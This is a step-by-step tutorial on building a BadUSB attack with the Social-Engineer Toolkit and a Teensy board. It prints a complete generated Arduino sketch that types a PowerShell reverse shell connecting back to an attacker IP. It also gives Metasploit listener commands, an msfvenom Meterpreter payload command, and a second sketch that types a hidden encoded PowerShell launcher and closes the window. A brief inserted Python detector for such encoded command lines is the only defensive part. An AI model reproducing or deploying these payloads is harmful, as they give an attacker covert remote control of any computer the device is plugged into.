Generating BadUSB Attack Vectors with Setoolkit

For how to build a BadUSB, see: Making a Simple Shutdown BadUSB with a Teensy++2.0

Start Setoolkit:

setoolkit
[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 7.7.5
                   Codename: 'Blackout'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.

     Join us on irc.freenode.net in channel #setoolkit

   The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!


 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Return back to the main menu.

Enter 1 to select Social-Engineering Attacks.

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

Enter 6 to select the Arduino-Based Attack Vector.

 Select a payload to create the pde file to import into Arduino:

   1) Powershell HTTP GET MSF Payload
   2) WSCRIPT HTTP GET MSF Payload
   3) Powershell based Reverse Shell Payload
   4) Internet Explorer/FireFox Beef Jack Payload
   5) Go to malicious java site and accept applet Payload
   6) Gnome wget Download Payload
   7) Binary 2 Teensy Attack (Deploy MSF payloads)
   8) SDCard 2 Teensy Attack (Deploy Any EXE)
   9) SDCard 2 Teensy Attack (Deploy on OSX)
  10) X10 Arduino Sniffer PDE and Libraries
  11) X10 Arduino Jammer PDE and Libraries
  12) Powershell Direct ShellCode Teensy Attack
  13) Peensy Multi Attack Dip Switch + SDCard Attack
  14) HID Msbuild compile to memory Shellcode Attack

  99) Return to Main Menu

Enter 3 to generate the PowerShell-based reverse_tcp attack vector.

[*] INO file created. You can get it under '/root/.set/reportsteensy_2018-03-24 09:24:27.876891.ino'
[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino

[*] If your running into issues with VMWare Fusion and the start menu, uncheck
the 'Enable Key Mapping' under preferences in VMWare
Press {return} to continue.

Because this is a virtual machine, the program wrote the code directly to the ~/.set/reports directory.

┌─[root@parrot]─[~/.set/reports]
└──╼ #ls
'teensy_2018-03-24 09:24:27.876891.ino'
┌─[root@parrot]─[~/.set/reports]
└──╼ #

View the contents: cat teensy_2018-03-24\ 09\:24\:27.876891.ino

//
// Social-Engineer Toolkit Teensy Attack Vector
// Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG)
//
// Special thanks to: Irongeek
// You will need to setup a netcat listener MSF cannot handle this payload
//
// 2011-02-28 padzero@gmail.com
// * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets
// * Changed from script to interactive powershell execution: Bypass Restricted Powershell Execution Policies
//

#define ascii_println Keyboard.println

void setup() { 
  delay(10000);
  omg("powershell");
  delay(1000);
  // Here is the payload...
  // This is a reverse bind shell through powershell.  I need to fix it use the 
  // bind shell.  The reverse bind shell code is cleaner though.
  // I bet we could use the dip switches to configure the IP addy or port...
  ascii_println("function cleanup {");
  ascii_println("if ($client.Connected -eq $true) {$client.Close()}");
  ascii_println("if ($process.ExitCode -ne $null) {$process.Close()}");
  ascii_println("exit}");
  // Setup 192.168.1.1 HERE
  ascii_println("$address = '192.168.1.1'");
  // Setup PORT HERE
  ascii_println("$port = '4444'");
  ascii_println("$client = New-Object system.net.sockets.tcpclient");
  ascii_println("$client.connect($address,$port)");
  ascii_println("$stream = $client.GetStream()");
  ascii_println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize");
  ascii_println("$process = New-Object System.Diagnostics.Process");
  ascii_println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'");
  ascii_println("$process.StartInfo.RedirectStandardInput = 1");
  ascii_println("$process.StartInfo.RedirectStandardOutput = 1");
  ascii_println("$process.StartInfo.UseShellExecute = 0");
  ascii_println("$process.Start()");
  ascii_println("$inputstream = $process.StandardInput");
  ascii_println("$outputstream = $process.StandardOutput");
  ascii_println("Start-Sleep 1");
  ascii_println("$encoding = new-object System.Text.AsciiEncoding");
  ascii_println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}");
  ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.Length)");
  ascii_println("$out = $null; $done = $false; $testing = 0;");
  ascii_println("while (-not $done) {");
  ascii_println("if ($client.Connected -ne $true) {cleanup}");
  ascii_println("$pos = 0; $i = 1");
  ascii_println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {");
  ascii_println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)");
  ascii_println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}");
  ascii_println("if ($pos -gt 0) {");
  ascii_println("$string = $encoding.GetString($networkbuffer,0,$pos)");
  ascii_println("$inputstream.write($string)");
  ascii_println("start-sleep 1");
  ascii_println("if ($process.ExitCode -ne $null) {cleanup}");
  ascii_println("else {");
  ascii_println("$out = $encoding.GetString($outputstream.Read())");
  ascii_println("while($outputstream.Peek() -ne -1){");
  ascii_println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}");
  ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.length)");
  ascii_println("$out = $null");
  ascii_println("$string = $null}} else {cleanup}}");
  ascii_println(""); //Enter to start execution
}

void loop() {
}

void omg(char *SomeCommand)
{
  Keyboard.set_modifier(128); 
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now(); 
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  delay(1500);
  ascii_println(SomeCommand);
}

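The line ascii_println("$address = '192.168.1.1'"); is where the connect-back address is set.

After editing, load the code into Arduino and flash it to the Teensy 2.0++.

Start the msf handler in Parrot to listen: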

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.59.128
LHOST => 192.168.59.128
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.59.128:4444 

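Plug the Teensy 2.0++ into the computer.

PowerShell opens automatically and the attack vector is typed in.

The listener on the right receives the shell.


This is an ordinary reverse_tcp cmd shell. To get a Meterpreter shell instead, you can choose option 1, Powershell HTTP GET MSF Payload, in the menu above; that requires hosting the trojan on your own server and running an HTTP server so the target machine can download and execute it.

Here a different way is used to get a Meterpreter shell.

First, generate the cmd command that yields the Meterpreter shell: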

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.59.128 LPORT=4455 -f psh-cmd

The generated payload:

%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e <base64-encoded payload omitted>
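A defender's view of the command line above, as an added example that is not part of the original post or of SET/Metasploit: the sketch below takes process-creation command lines (as recorded by Sysmon or Windows event 4688 logging), recognises the abbreviated -nop -w hidden -e switches, and decodes the -e argument (base64 over UTF-16LE) for triage. The function names and the sample events are assumptions constructed for illustration; the encoded sample is a harmless Write-Output.

```python
import base64

# Full powershell.exe parameter name -> shortest prefix it accepts.
PS_PARAMS = {"encodedcommand": "e", "noprofile": "nop", "windowstyle": "w"}
DASHES = "-/\u2013\u2014\u2015"  # PowerShell also accepts Unicode dashes


def match_param(token):
    """Map a token such as -e, -enc or -NoP to its full parameter name."""
    if not token or token[0] not in DASHES:
        return None
    key = token[1:].lower()
    if key == "ec":  # alias accepted for -EncodedCommand
        return "encodedcommand"
    for full, shortest in PS_PARAMS.items():
        if full.startswith(key) and key.startswith(shortest):
            return full
    return None


def triage(cmdline):
    """Inspect one process-creation command line; None if not PowerShell."""
    tokens = [t.strip('"') for t in cmdline.split()]
    names = [t.lower().rsplit("\\", 1)[-1] for t in tokens]
    start = next((i for i, n in enumerate(names)
                  if n in ("powershell", "powershell.exe")), None)
    if start is None:
        return None
    found = {"noprofile": False, "hidden": False, "decoded": None}
    args = iter(tokens[start + 1:])
    for tok in args:
        name = match_param(tok)
        if name == "noprofile":
            found["noprofile"] = True
        elif name == "windowstyle":
            found["hidden"] = next(args, "").lower() == "hidden"
        elif name == "encodedcommand":
            try:  # -EncodedCommand is base64 over UTF-16LE text
                raw = base64.b64decode(next(args, ""), validate=True)
                found["decoded"] = raw.decode("utf-16-le")
            except ValueError:
                found["decoded"] = "<undecodable>"
    found["suspicious"] = (found["decoded"] is not None
                           and (found["noprofile"] or found["hidden"]))
    return found


def encode_sample(script):
    """Build a harmless encoded command for the constructed samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


BENIGN = "Write-Output 'constructed sample'"
SAMPLE_EVENTS = [  # constructed command lines, not captured from a real host
    r"C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe "
    "-nop -w hidden -e " + encode_sample(BENIGN),
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    "-WindowStyle Hidden -EncodedCommand " + encode_sample(BENIGN),
    r"notepad.exe C:\notes.txt",
]

if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        print(triage(line))
```

Matching on parameter prefixes rather than the literal string "-e" matters because the same switch can be written -e, -ec, -enc or -EncodedCommand.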

Then modify the code from the earlier simple-shutdown BadUSB.

Replace the shutdown command it used to type with the payload above:

#include "Keyboard.h"


/* Init function */
void setup()
{
  // Beginning the Keyboard stream
  Keyboard.begin();

  // Wait 500ms
  delay(500);
  delay(3000);

  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();

  delay(500);

  Keyboard.print("cmd");

  delay(1000);

  Keyboard.press(KEY_RETURN);
  delay(50);
  Keyboard.release(KEY_RETURN);

  delay(1000);
  Keyboard.print("%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e <base64 payload from the msfvenom output above, omitted>");
  Keyboard.press(KEY_RETURN);
  delay(50);
  Keyboard.release(KEY_RETURN);
  delay(700);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(KEY_F4);
  Keyboard.releaseAll();
  // Ending stream
  Keyboard.end();
}

/* Unused endless loop */
void loop() {}

Start the listener:

msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.59.128:4455 

Flash the board again.

Once flashing completes, cmd pops up, the attack code is typed in, and the shell is received.
